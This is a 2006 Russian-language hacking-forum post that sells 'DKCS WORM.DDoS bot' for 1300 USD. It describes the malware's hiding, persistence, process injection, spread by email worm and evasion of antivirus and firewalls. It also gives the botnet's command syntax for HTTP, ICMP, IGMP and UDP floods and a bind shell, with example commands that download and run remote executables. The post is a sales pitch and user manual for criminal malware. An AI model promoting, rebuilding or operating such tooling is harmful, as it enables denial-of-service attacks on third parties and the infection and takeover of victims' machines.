• XSS.stack #1 – первый литературный журнал от юзеров форума

DKCS WORM.DDoS bot v 0.1

В этой теме можно использовать автоматический гарант!

Статус
Закрыто для дальнейших ответов.

Dr.Pixel@DKCS

floppy-диск
Пользователь
Регистрация
16.07.2006
Сообщения
1
Реакции
0
//-----------------------------------------------------------------
DKCS WORM.DDoS bot v 0.1
c0d3d by: Dr.Pixel
2006 © DKCS Security

ЦЕНА - 1300 USD/WMZ

контакты: icq: 7600278
e-mail: dkcs@void.ru

Общие возможности:

1 Создание своей DDoS-сети.
2 Управление DDoS-сетью через WEB-интерфейс.
3 Создание правил для управления ботами (в WEB интерфейсе).
4 Возможность управления каждым ботом в отдельности.
//-----------------------------------------------------------------
Возможности бота:

1 Нивидимость в процессах.
2 Оптимальный режим работы ботом выбирается самостоятельно.
//=========
с парвами пользователя:
1 Бот записывается HKLM/.../Run (автозагрузку).
2 Инжектит свой код в процесс explorer.exe.
с правами администратора:
1 Бот создает сервис со своей загрузкой.
1.1 Невидно в процессах.
1.2 Вы еще не зашли под пользователем, а бот уже работает.
2 Инжектит свой код в svchost.exe.
2.1 svchost.exe - обычно в разрешенных приложениях в фаерволле.
(некоторые фаерволы детектируют "насильное" изменение памяти
процессов, над обходом уже работаю...)
//=========
4 Бот распространяется как почтовый червь (опционально).
4.1 E-mail адреса из адресной книги Outlook.
4.2 Отсылается через SMTP сервер зараженного.
//-----------------------------------------------------------------
Функции бота:

1 Собственно многопоточный HTTP DDoS.
1.1 Поддержка как GET, так и POST ддоса.
1.2 Базовая HTTP авторизация.
1.3 Настройка параметров ддоса.
2 Многопоточный ICMP флуд.
3 Многопоточный IGMP флуд (new exploit under WinNT)
4 Многопоточный UDP флуд.
5 Бинд шелл.
6 Socks4 сервер.
7 Скачивание и запуск произвольного файла.
//-----------------------------------------------------------------
Синтаксис команд бота:

1. HTTP DDoS:

!ddos <type> <host> <port> <script> <param> <auch?> <login> <pass>

<type> - тип ддоса (get или post).
<host> - адрес атакуемого сервера.
<port> - порт, на котором запущен сервер.
<script> - скрипт, который атакуется.
<param> - параметры, с которыми идет запрос на скрипт.
<auch?> - использовать авторизацию (1 - да, 0 - нет).
<login> - логин (если используется авторизация).
<pass> - пароль (если используется авторизация).

Примеры запросов:
!ddos post server.ru 80 /index.php name=111&email=222&message=333&submit=send 1 admin passwd
!ddos post server.ru 80 /index.php name=111&email=222&message=333&submit=send
!ddos get server.ru 80 /

(НЕ ЗАБЫВАЙТЕ ПРИ ФЛУДЕ ФОРМ УКАЗЫВАТЬ НАЖАТИЕ НА КНОПКУ!)

2. ICMP флуд:

!icmp <IP> <packet_size>

<IP> - ИП адресс атакуемого сервера.
<packet_size> - размер посылаемого пакета.

Пример запроса:
!icmp 10.11.12.13 256

3. IGMP флуд:

!igmp <IP>

<IP> - ИП адресс атакуемого сервера.

Пример запроса:
!igmp 10.11.12.1

4. UDP флуд:

!udp <IP>

<IP> - ИП адресс атакуемого сервера.

Пример запроса:
!udp 10.11.12.1

5. Скачивание и запуск файла:

!download <from> <to> <run?> <del?>

<from> - откуда скачивать.
<to> - куда скачивать.
<run?> - запускать файл (1 - да, 0 - нет)?
<del?> - удалять файл (1 - да, 0 - нет)?

Примеры запросов:
!download http://server.ru/file.exe c:\cccp.exe 1 0
!download http://server.ru/file.exe c:\abcd.exe 1 1

//-----------------------------------------------------------------
Дополнительная информация:

1 Размер (не сжатого!) файла бота: 48,0 KBytes (49 152 Bytes).
(сжатый, в среднем - 20-25 KBytes)
2 Антивирусные системы:
[ + ] All AVP: вирусов не обнаружено.
(Zащита файла бота от AVP)
3 FiewWall's:
[ + ] All FRW: все молчат.
(в случае, если сервис бота был загружен раньше, чем фаерволла)
//-----------------------------------------------------------------
контакты: icq: 7600278
e-mail: dkcs@void.ru
P.S.
You can change the world!
If not, ask me how ;)

2006 &copy; Dr.Pixel@DKCS
//-----------------------------------------------------------------
 
Статус
Закрыто для дальнейших ответов.
Верх